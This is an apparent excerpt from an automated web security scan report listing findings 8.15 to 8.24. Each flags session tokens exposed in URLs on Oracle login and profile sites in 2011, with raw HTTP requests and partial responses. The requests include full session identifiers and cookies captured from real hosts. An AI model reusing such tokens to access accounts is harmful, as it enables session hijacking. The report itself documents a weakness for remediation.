HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:04:33 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 88546 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]...
8.15. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://login.oracle.com
Path:
/pls/orasso/orasso.wwsso_app_admin.ls_login
Issue detail
The URL in the request appears to contain a session token within the query string:https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:13 GMT Set-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d; path=/; HttpOnly X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1 X-Powered-By: Servlet/2.5 JSP/2.1 Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/ Content-Length: 3286 <html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
8.16. https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/adf/images/sibusy.gif
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/adf/images/sibusy.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:22 GMT Cache-Control: Public Expires: Mon, 03 Sep 2012 16:14:22 GMT Content-Type: image/gif Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186961165318884,1) Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT Content-Length: 781 GIF89a.....................................................................................................................................................................................................[SNIP]...
8.17. https://myprofile.oracle.com/EndUser/adf/images/siready.gif
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/adf/images/siready.gif
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/adf/images/siready.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/adf/images/siready.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:22 GMT Cache-Control: Public Expires: Mon, 03 Sep 2012 16:14:22 GMT Content-Type: image/gif Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186948280416951,1) Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT Content-Length: 417 GIF89a.....................................................................................................................................................................................................[SNIP]...
8.18. https://myprofile.oracle.com/EndUser/adf/images/t.gif
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/adf/images/t.gif
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/adf/images/t.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/adf/images/t.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:22 GMT Cache-Control: Public Expires: Mon, 03 Sep 2012 16:14:22 GMT Content-Type: image/gif Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186935395515062,0) Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT Content-Length: 86 GIF89a.......................................................!.......,........@...D.;
8.19. https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/adf/jsLibs/Common1_2_12_1.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/adf/jsLibs/Common1_2_12_1.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:20 GMT Cache-Control: Public Expires: Mon, 03 Sep 2012 16:14:20 GMT Content-Type: application/x-javascript Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186664812572695,0) Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT Content-Length: 183096 var _byteLenKey="org.apache.myfaces.trinidad.validator.ByteLengthValidator.MAXIMUM"; function TrByteLengthValidator( a0, a1 ) { this._length=a0; this._messages=a1; this._class="TrByteLengthValidator";...[SNIP]...
8.20. https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:07:15 GMT Cache-Control: Public Expires: Mon, 03 Sep 2012 16:07:16 GMT Last-Modified: Fri, 05 Aug 2011 05:00:27 GMT Content-Type: text/css Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=109;ecid=30186720647148143,0) Content-Length: 31848 /* This CSS file generated on Thu Aug 04 22:00:27 PDT 2011 */ .AFInstructionText,.x0,.AFFieldText,.x6,.xk,.xl,.xm,.x23,.x24,.x25,.x26,.x2a,.x2b,.x2c,.x2d,.x2e,.x2f,.x2g,.x2h,.x2i,.x2j,.x1u.x2n .x25,.x...[SNIP]...
8.21. https://myprofile.oracle.com/EndUser/images/fading-background.png
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/images/fading-background.png
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/images/fading-background.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422
Request
GET /EndUser/images/fading-background.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_cc=true; s_nr=1315343797232; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleblogs%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:16:38 GMT Accept-Ranges: bytes Content-Type: text/html Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30195555395017574,0) Last-Modified: Fri, 11 Feb 2011 22:10:22 GMT Content-Length: 164 .PNG . ...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...FIDATx.b......01..(.x.....G.;.....QW~....h,.....FK...l$..._.}..:... ....G...U.....IEND.B`.
8.22. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/images/logo-oracle-red.png
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422
Request
GET /EndUser/images/logo-oracle-red.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:21 GMT Accept-Ranges: bytes Content-Type: text/html Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186767891789108,1) Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT Content-Length: 908 .PNG . ...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M ..{..........g.t..].Sd...]...D..d.3.............|........[SNIP]...
8.23. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/jscripts/s_code.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:08:35 GMT Accept-Ranges: bytes Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT Content-Type: text/html Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=40;ecid=30186712057213538,0) Content-Length: 30025 /* SiteCatalyst code version: H.19.4. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ ...[SNIP]...
8.24. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/jscripts/s_code_popup.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/jscripts/s_code_popup.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000
Response
